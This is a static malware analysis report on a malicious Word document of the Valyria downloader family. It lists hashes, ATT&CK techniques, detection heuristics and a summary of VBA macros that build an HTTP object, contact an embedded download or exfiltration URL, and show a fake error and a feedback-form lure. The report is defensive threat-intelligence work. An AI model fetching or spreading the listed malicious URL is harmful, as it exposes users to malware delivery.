Valyria — Office (OLE) / .DOCX malware analysis

Static analysis result for SHA-256 924657d7883d8b56…

MALICIOUS

Office (OLE) / .DOCX

38.5 KB Created: 2021-07-06 04:33:00 Authoring application: Microsoft Office Word
MD5: 074ed5398b616205258192bf7a3b6d01 SHA-1: 2b3ddae8c9f179fa84254166af02f37f34ce12c6 SHA-256: 924657d7883d8b569b9ab1a979b5492b7b6426ead1435e422b6c21dafd6657c9
202 Risk Score

Malware Insights

Valyria · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059.001 PowerShell T1140 Deobfuscate/Decode Files or Information

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Valyria-10033997-0. VBA macros are present and utilize CreateObject and CallByName, indicating dynamic execution. The script attempts to reconstruct the string "MSXML2.ServerXMLHTTP" to create an object for making HTTP requests. The embedded URL https://fg-356-offis-dowload.com/ecm/ibm/1629832139/feedback is likely used to send collected data or download additional payloads. The Document_Close subroutine shows a fake error message and then displays a user form named 'frmFeedback', suggesting a phishing or data collection lure.

Heuristics 6

  • ClamAV: Doc.Downloader.Valyria-10033997-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033997-0
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://fg-356-offis-dowload.com/ecm/ibm/1629832139/feedback
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
eece5c8b7fd4440887598978d4db76dc0d38fbf0fd4fbe6e5bbb2f3e165d4818		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 3134 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.